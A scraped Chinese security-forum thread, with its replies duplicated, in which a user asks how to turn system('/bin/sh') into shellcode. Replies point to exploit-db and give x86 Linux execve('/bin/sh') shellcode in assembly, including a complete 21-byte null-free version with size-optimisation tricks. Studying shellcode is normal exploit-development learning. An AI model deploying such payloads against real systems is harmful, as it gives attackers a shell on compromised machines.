[求助]system("/bin/sh")如何转换为机器码加到shellcode里面去-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

最新回复 (5)
Keoyo 雪币： 292 活跃值： (850) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 2 楼 exploit-db上Linux相关的shellcode有很多啊 2016-12-5 11:42 0
王一航雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	王一航 3 楼可以参考一下这个视频 , eabK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2&6L8%4g2@1N6h3u0W2i4K6u0W2j5$3!0E0i4K6u0r3N6$3q4@1j5$3S2Q4x3@1k6$3i4K6y4p5g2Y4N6f1g2f1W2K9K9f1Z5#2L8e0b7`. , 讲了一些 shellcode 的技巧和优化方法 , 还有这篇文章 Shellcode奇技淫巧汇总[持续更新]3d6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6A6j5h3&6K6K9s2g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3i4K6u0r3j5e0M7H3y4X3c8V1j5K6q4V1y4X3u0T1 2017-3-19 18:20 0
沈园雪币： 47 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	沈园 4 楼为什么要调用system呢，直接系统调用啊，也就几十个字节的事情 2017-3-20 15:26 0
netwind 雪币： 14462 活跃值： (3935) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼 mov eax,0xb mov ebx,bin_sh; "/bin/sh" xor ecx,ecx xor edx,edx int 0x80 2017-3-20 23:17 0
王一航雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	王一航 6 楼 ; Length : 21 Bytes ; Tested on : Linux x86 ; Author : WangYihang ; Email : yihangwanger@gmail.com ; More : 2fbK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0L8$3c8A6L8X3N6Q4x3X3g2F1k6i4c8Q4x3V1k6#2i4K6u0r3P5h3W2Z5j5h3&6Y4N6$3q4F1k6#2)9J5c8Y4m8Q4x3V1k6H3N6$3&6E0k6g2)9J5c8X3N6A6N6l9`.`. global _start _start: ; execve ; 这里需要保证 '/bin//sh' 以 0 结尾 ; 因此需要在汇编中写入代码手动将其调整为 0 xor ecx, ecx ; hex("/bin//sh") = 0x2f62696e2f2f7368 push ecx ; string must end with \x00 push 68732f2fH push 6e69622fH mov ebx, esp ; xor eax, eax ; mov al, 0bH ; use push pop to cut down the shellcode push byte 0bH pop eax cdq ; set edx = 0 int 80H 2017-3-21 22:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (5)
Keoyo 雪币： 292 活跃值： (850) 能力值： ( LV6，RANK：90 ) 在线值：发帖 9 回帖 219 粉丝 20 关注私信	Keoyo 2 2 楼 exploit-db上Linux相关的shellcode有很多啊 2016-12-5 11:42 0
王一航雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	王一航 3 楼可以参考一下这个视频 , eabK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6%4N6%4N6Q4x3X3g2&6L8%4g2@1N6h3u0W2i4K6u0W2j5$3!0E0i4K6u0r3N6$3q4@1j5$3S2Q4x3@1k6$3i4K6y4p5g2Y4N6f1g2f1W2K9K9f1Z5#2L8e0b7`. , 讲了一些 shellcode 的技巧和优化方法 , 还有这篇文章 Shellcode奇技淫巧汇总[持续更新]3d6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6A6j5h3&6K6K9s2g2Q4x3X3g2U0L8$3#2Q4x3V1k6H3i4K6u0r3j5e0M7H3y4X3c8V1j5K6q4V1y4X3u0T1 2017-3-19 18:20 0
沈园雪币： 47 活跃值： (22) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 7 粉丝 0 关注私信	沈园 4 楼为什么要调用system呢，直接系统调用啊，也就几十个字节的事情 2017-3-20 15:26 0
netwind 雪币： 14462 活跃值： (3935) 能力值： (RANK：520 ) 在线值：发帖 86 回帖 844 粉丝 26 关注私信	netwind 13 5 楼 mov eax,0xb mov ebx,bin_sh; "/bin/sh" xor ecx,ecx xor edx,edx int 0x80 2017-3-20 23:17 0
王一航雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 6 粉丝 0 关注私信	王一航 6 楼 ; Length : 21 Bytes ; Tested on : Linux x86 ; Author : WangYihang ; Email : yihangwanger@gmail.com ; More : 2fbK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6U0L8$3c8A6L8X3N6Q4x3X3g2F1k6i4c8Q4x3V1k6#2i4K6u0r3P5h3W2Z5j5h3&6Y4N6$3q4F1k6#2)9J5c8Y4m8Q4x3V1k6H3N6$3&6E0k6g2)9J5c8X3N6A6N6l9`.`. global _start _start: ; execve ; 这里需要保证 '/bin//sh' 以 0 结尾 ; 因此需要在汇编中写入代码手动将其调整为 0 xor ecx, ecx ; hex("/bin//sh") = 0x2f62696e2f2f7368 push ecx ; string must end with \x00 push 68732f2fH push 6e69622fH mov ebx, esp ; xor eax, eax ; mov al, 0bH ; use push pop to cut down the shellcode push byte 0bH pop eax cdq ; set edx = 0 int 80H 2017-3-21 22:20 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复